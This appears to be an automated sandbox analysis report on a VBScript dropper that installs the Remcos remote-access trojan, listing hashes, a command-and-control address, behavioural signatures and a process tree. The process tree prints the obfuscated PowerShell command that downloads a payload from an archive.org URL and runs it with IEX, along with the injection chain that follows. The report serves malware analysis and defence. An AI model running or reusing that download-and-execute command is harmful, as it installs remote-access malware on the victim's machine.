Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
20-04-2021 06:00
Static task
static1
Behavioral task
behavioral1
Sample
Appraisal11002275444900.vbs
Resource
win7v20210408
General
-
Target
Appraisal11002275444900.vbs
-
Size
662B
-
MD5
8da164753530662b1f603f7b23413223
-
SHA1
18a3665edcb3b3d3c53f9755bc225569a64ae642
-
SHA256
b61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388
-
SHA512
b3c8b9e85c2ab36abf02b479e68287890d94f8c125151ed88f8f26a509444de8207835b51131eee1095f7f3bf37e284e6853ff3b9aa63e91781f2e93b68e95c0
Malware Config
Extracted
remcos
194.5.97.183:8888
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 6 2020 powershell.exe 8 2020 powershell.exe 10 2020 powershell.exe 12 2020 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1772 set thread context of 1016 1772 powershell.exe aspnet_regbrowsers.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 30 IoCs
Processes:
powershell.exepowershell.exepid process 2020 powershell.exe 2020 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2020 powershell.exe Token: SeDebugPrivilege 1772 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
aspnet_regbrowsers.exepid process 1016 aspnet_regbrowsers.exe -
Suspicious use of WriteProcessMemory 43 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 484 wrote to memory of 2020 484 WScript.exe powershell.exe PID 484 wrote to memory of 2020 484 WScript.exe powershell.exe PID 484 wrote to memory of 2020 484 WScript.exe powershell.exe PID 2020 wrote to memory of 1772 2020 powershell.exe powershell.exe PID 2020 wrote to memory of 1772 2020 powershell.exe powershell.exe PID 2020 wrote to memory of 1772 2020 powershell.exe powershell.exe PID 1772 wrote to memory of 868 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 868 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 868 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 868 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 816 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 816 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 816 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 816 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 668 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 668 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 668 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 668 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1092 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1092 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1092 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1092 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1132 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1132 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1132 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1132 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 288 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 288 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 288 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 288 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1016 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1016 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1016 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1016 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1016 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1016 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1016 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1016 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1016 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1016 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1016 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1016 1772 powershell.exe aspnet_regbrowsers.exe PID 1772 wrote to memory of 1016 1772 powershell.exe aspnet_regbrowsers.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisal11002275444900.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601405.us.archive.org/15/items/all_20210407_20210407_0728/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
023e3629230c97ee512ba0b1b5a0f4c5
SHA1bc844320b29d8b0f7b8861c4bf4a5ccafda9ee06
SHA25654f54a146f091777c976f8232e1985dec68bc2b46ed183bb3e31352c8d254896
SHA512da2161879a243a1930daf9c65f8e879cc5899ec23496c3f1c328a89a3fc6b0958c36891d42c030e899ddaa8c760f1297a2337db5fb5f5f0a8b7c89063e2a0894
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
7f551a39dcd11eac4c89c54ebdef73cf
SHA14580923df7981be10e3580028b9ed3124989efb2
SHA256b578ca32295c5cdcebcacc975ea0b8f9e07e0538a1c9e6998740d63bce457785
SHA512e48a4db57128216aae1460de9df8dc54cb32c32d55dc9afb18424dc26096ded254c25913481f83a8d295f7d4e0945fd50b1bcfa8efbb029cee18cbf3fd5d7f0e
-
C:\Users\Public\ Microsoft.ps1MD5
b5795726bb04f5f9584184ae1f50777b
SHA191b250e76c41066a009b70200c5254a40980228b
SHA2565d9ba7ab51a7d06ad420cb23f7c1e02b911fe2e25d7af1eebe25d1690231d784
SHA51210ba2e523af4ccdf3e1e0867aa4d50a58919f5d39073bac17a8ab491f5ce09bcbda0730b9485a503adccfa323642b19e29879a0ad88f609d683080b668ef95fb
-
memory/484-59-0x000007FEFB761000-0x000007FEFB763000-memory.dmpFilesize
8KB
-
memory/1016-88-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/1016-87-0x0000000075AD1000-0x0000000075AD3000-memory.dmpFilesize
8KB
-
memory/1016-85-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/1016-86-0x000000000042EEEF-mapping.dmp
-
memory/1772-70-0x0000000000000000-mapping.dmp
-
memory/1772-77-0x000000001AC80000-0x000000001AC82000-memory.dmpFilesize
8KB
-
memory/1772-78-0x000000001AC84000-0x000000001AC86000-memory.dmpFilesize
8KB
-
memory/1772-82-0x000000001AA00000-0x000000001AA18000-memory.dmpFilesize
96KB
-
memory/2020-69-0x000000001C4A0000-0x000000001C4A1000-memory.dmpFilesize
4KB
-
memory/2020-68-0x000000001B890000-0x000000001B891000-memory.dmpFilesize
4KB
-
memory/2020-67-0x0000000002520000-0x0000000002521000-memory.dmpFilesize
4KB
-
memory/2020-66-0x00000000025C0000-0x00000000025C1000-memory.dmpFilesize
4KB
-
memory/2020-64-0x000000001AB90000-0x000000001AB92000-memory.dmpFilesize
8KB
-
memory/2020-65-0x000000001AB94000-0x000000001AB96000-memory.dmpFilesize
8KB
-
memory/2020-63-0x000000001AC10000-0x000000001AC11000-memory.dmpFilesize
4KB
-
memory/2020-62-0x0000000002360000-0x0000000002361000-memory.dmpFilesize
4KB
-
memory/2020-60-0x0000000000000000-mapping.dmp